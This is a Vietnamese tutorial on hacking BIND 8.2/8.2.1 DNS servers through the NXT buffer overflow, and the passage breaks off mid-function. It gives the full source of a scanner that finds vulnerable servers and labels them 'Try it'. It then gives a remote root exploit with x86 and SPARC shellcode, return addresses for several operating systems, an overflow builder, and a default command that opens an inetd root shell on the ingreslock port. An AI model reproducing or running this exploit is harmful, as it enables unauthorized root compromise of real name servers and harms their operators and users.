Hack BIND 8.2/8.2.1 qua bug "NXT"
Các máy chủ tên miền (DNS server) chạy BIND 8.2/8.2.1 không xử lí chính xác các record NXT. Điều này tạo điều kiện cho attacker có thể làm tràn bộ đệm của BIND và thi hành các mã lệnh độc đoán trên máy chủ tên miền mà cụ thể nhất là lấy root (theo CA-99-14, ngày 10/11/1999)
Dưới đây là cách để hack các máy chủ tên miền chạy BIND 8.2/8.2.1 gặp bug "nxt" nhưng chưa được patch
Bước 1: scan các DNS server gặp bug "nxt" bằng CBIND (cảm ơn Nguyễn Xuân Bình nha)
/* BIND NXT vulnerable SCANNER - CBIND */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* DO NOT EDIT THIS LINE */
#define SCAN_EXE "./nmap -p 53 "
/* EDIT: directory of NMAP */
#define SCAN_DIR "/home/lb0gspm/tmp/nmap/"
/* EDIT: directory of CBIND and it's temporary files */
#define CBIND_DIR "/home/lb0gspm/tmp/cbind/"
#define R1_DIR "/home/lb0gspm/tmp/cbind/result1.cbind"
#define R2_DIR "/home/lb0gspm/tmp/cbind/result2.cbind"
int Scan( char *ip );
char *GetSubnet( char *ip );
char *ChangeSubnet( char *ip, char *subnet );
char *itoa( int i );
int main( int argc, char *argv[] )
{
struct in_addr addr;
struct hostent *host_entry;
unsigned short int option[3], i, wait_st;
unsigned char *name;
unsigned char *cmd;
unsigned char *ip, *subnet, *ip_s;
unsigned char *temp;
FILE *fp;
printf( "Check BIND v 2.00b \n" );
printf( "Bind NXT vulnerablity scanner\n\n" );
name = (char *)malloc( 200 );
ip = (char *)malloc( 16 );
ip_s = (char *)malloc( 16 );
subnet = (char *)malloc( 4 );
cmd = (char *)malloc( 50 );
if( argc == 1 )
{
printf( "Options: \n" );
printf( " -s SUB-NET SCAN ( SLOW BUT HIGH PRECISE )\n" );
printf( " -f SUB-NET SCAN ( FAST BUT LOW PRECISE / NMAP REQUIRE )\n" );
printf( " -i PRINT INFOMATION\n\n" );
printf( "Examples: \n" );
printf( " cbind victim.com ( IT WILL SCAN IF TARGET IS VULNERABLE OR NOT )\n" );
printf( " cbind victim.com -s ( IT WILL SCAN ALL SUB-NETs IN DETAIL )\n" );
printf( " cbind -f victim.com ( IT WILL SCAN SUB-NETs LOW PRECISE )\n\n" );
exit(0);
} else {
option[0] = 0;
option[1] = 0;
option[2] = 0;
for( i = 1; i < argc; i++ )
{
if( strcmp( argv[i], "-s" ) == 0 )
{
if( option[2] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use option -s with -i.\n" );
exit(0);
}
printf( "Sub-net( high precise ) scan mode ACTIVATED.\n" );
printf( "It can takes long.\n\n" );
option[1] = 1;
continue;
}
if( strcmp( argv[i], "-f" ) == 0 )
{
if( option[1] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use options -f with -i.\n" );
exit(0);
}
printf( "Sub-net( low precise ) scan mode ACTIVATED.\n" );
printf( "It require NMAP 2.07 or higher version.\n\n" );
option[2] = 1;
continue;
}
if( strcmp( argv[i], "-i" ) == 0 )
{
if( (option[1] == 1) || (option[2] == 1) )
{
printf( "Can not use option -i with -s(or -f).\n" );
exit(0);
}
option[0] = 1;
continue;
}
strcpy( name, argv[i] );
}
}
if( geteuid() != 0 )
{
printf( "Error! You are not ROOT!\n" );
exit(0);
}
if( (name[0] <= '0') || (name[0] >= '9') )
{
host_entry = gethostbyname( name );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
if( (name[0] >= '0') && (name[0] <= '9') )
{
host_entry = gethostbyaddr( name, strlen(name), AF_INET );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) )
{
Scan( ip );
printf( "Scanning Done.\n" );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
}
if( option[1] == 1 )
{
for( i = 0; i < 256; i++ )
{
if( fork() == 0 )
{
strcpy( subnet, itoa( i ) );
ip_s = ChangeSubnet( ip, subnet );
Scan( ip_s );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
} else {
wait( NULL );
}
continue;
}
printf( "Scanning Done.\n" );
exit(0);
}
if( option[2] == 1 )
{
strcpy( cmd, SCAN_EXE );
strcat( cmd, name );
strcat( cmd, "/24" );
strcat( cmd, " > " );
strcat( cmd, R1_DIR );
chdir( SCAN_DIR );
system( cmd );
strcpy( cmd, "grep \"Interesting\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
if( ( fp = fopen( R2_DIR, "r" ) ) < 0 )
{
printf( "File Open Error!\n" );
exit(0);
}
while( 1 )
{
bzero( name, 200 );
temp = (char *)malloc( 200 );
strcpy( temp, " " );
temp = fgets( temp, 100, fp );
if( temp == NULL ) break;
if( temp[21] == ' ' )
{
for( i = 0; i < 16; i++ )
{
if( (temp[i+23] != ' ') && (temp[i+23] != ')') )
{
if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )
{
name[i] = temp[i+23];
} else {
if( temp[i+23] == '.' )
name[i] = temp[i+23];
}
}
}
}
if( temp[21] != ' ' )
{
for( i = 0; i < 50; i++ )
{
if( temp[i+21] != ' ' ) name[i] = temp[i+21];
}
}
Scan( name );
free(temp);
}
remove( R1_DIR );
remove( R2_DIR );
}
if( option[0] == 1 )
{
printf( "Creator : Laks Bluesky\n" );
printf( "E-mail : lb0gspm@hanmail.net\n\n" );
printf( "Version : 2.00 beta\n\n" );
printf( "2000.06.19\n" );
exit(0);
}
}
char *itoa( int i )
{
char *ret;
char c;
int count;
ret = (char *)malloc( 4 );
count = 1;
if( i > 9 ) count = 2;
if( i > 99 ) count = 3;
if( count == 1 )
{
c = i+48;
ret[0] = c;
ret[1] = '\0';
return ret;
}
if( count == 2 )
{
c = i / 10;
i = i - (c*10);
ret[0] = c+48;
ret[1] = i+48;
ret[2] = '\0';
return ret;
}
if( count == 3 )
{
c = i / 100;
i = i - (c*100);
ret[0] = c+48;
c = i / 10;
i = i - (c*10);
ret[1] = c+48;
ret[2] = i+48;
ret[3] = '\0';
return ret;
}
}
char *ChangeSubnet( char *ip, char *subnet )
{
char *ip_s;
int count = 0, i = 0;
ip_s = (char *)malloc( 16 );
strcpy( ip_s, ip );
for( count = 0; count != 3; count = count )
{
if( ip_s[i] == '.' )
{
count++;
i++;
continue;
}
i++;
}
ip_s[i++] = subnet[0];
ip_s[i++] = subnet[1];
ip_s[i++] = subnet[2];
ip_s[i++] = subnet[3];
return ip_s;
}
char *GetSubnet( char *ip )
{
char *ret;
int count = 0, i = 0;
ret = (char *)malloc( 4 );
for( count = 0; count != 3; count = count )
{
if( ip[i] == '.' )
{
count++;
i++;
continue;
}
i++;
}
ret[0] = ip[i++];
ret[1] = ip[i++];
ret[2] = ip[i++];
ret[3] = ip[i++];
return ret;
}
int Scan( char *ip )
{
unsigned short int i;
unsigned char c;
unsigned char *cmd;
unsigned char *version;
FILE *fp;
struct stat result;
cmd = (char *)malloc( 200 );
version = (char *)malloc( 9 );
printf( "Scanning... %s\n", ip );
strcpy( cmd, "dig @" );
strcat( cmd, ip );
strcat( cmd, " version.bind chaos txt > " );
strcat( cmd, R1_DIR );
strcat( cmd, " 2> /dev/null" );
system( cmd );
strcpy( cmd, "grep \"VERSION.BIND.\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
stat( R2_DIR, &result );
if( result.st_size < 30 )
{
chdir( CBIND_DIR );
return 0;
}
if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 )
{
for( i = 0; i < 29; i++ )
{
c = fgetc( fp );
}
for( i = 0; i < 9; i++ )
{
c = fgetc( fp );
if( c == '"' )
{
version[i] = '\0';
break;
}
version[i] = c;
}
} else {
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.1" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2-P5" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.1.2" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
chdir( CBIND_DIR );
return 0;
}* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND
NSLOOKUP
# nslookup
Default Server: ns.yourco.bogus
Address: 333.333.333.333
> set class=chaos
> set type=txt
> version.bind
Server: ns.yourco.bogus
Address: 333.333.333.333
VERSION.BIND text = "8.2.2-P5"
>DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)
dig version.bind txt chaos @<server>hoặc
dig @ txt chaos version.bindNếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt"
Bước 2: lấy root shell bằng T666
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d};
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000},
{5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000},
{6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000},
{7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000},
{0, 0, 0, 0}
};
int arch=0;
char *command=0;
/* these two dns routines from dspoof/jizz */
/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
{
unsigned short i,len;
char *b=NULL;
len=(unsigned short)*(p++);
while (len)
{
while (len >= 0xC0)
{
if (!b)
b=p+1;
p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
len=(unsigned short)*(p++);
}
for (i=0;i<len;i++)
*(s++)=*(p++);
*(s++)='.';
len=(unsigned short)*(p++);
}
*(s++)=0;
if (b)
return(b);
return(p);
}
/* store a query name */
char *dnsaddlabel(char *p, char *label)
{
char *p1;
while ((*label) && (label))
{
if ((*label == '.') && (!*(label+1)))
break;
p1=strchr(label,'.');
if (!p1)
p1=strchr(label,0);
*(p++)=p1-label;
memcpy(p,label,p1-label);
p+=p1-label;
label=p1;
if (*p1)
label++;
}
*(p++)=0;
return(p);
}
void make_overflow(char *a)
{
int i;
unsigned long *b;
unsigned char *c;
char sbuf[4096];
if (archlist[arch].safe==0) /* linux */
{
memset(a,0x90,4134);
memcpy(a+3500,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3500+archlist[arch].codesize, command);
else
strcpy(a+3500+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else if (archlist[arch].safe==1) /* bsd */
{
memset(a,0x90,4134);
memcpy(a+3300,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3300+archlist[arch].codesize, command);
else
strcpy(a+3300+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else /*SPARC*/
{
memset(a,0x0,11000);
b=(unsigned long*)(a+4438);
for (i=0;i<1500;i++)
*b++=htonl(0xac15a16e);
c=(char *)b;
for (i=0;i<archlist[arch].codesize;i++)
*c++=archlist[arch].code[i];
if (command)
strcpy(c, command);
else
strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");
b=(unsigned long*)(a+4166);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i5 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o0 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o6 - significant
*b++=htonl(archlist[arch].ret); //o7 - retaddr
}
}
int form_response(HEADER *packet, char *buf)
{
char query[512];
int qtype;
HEADER *dnsh;
char *p;
char *walker;
memset(buf,0,sizeof(buf));
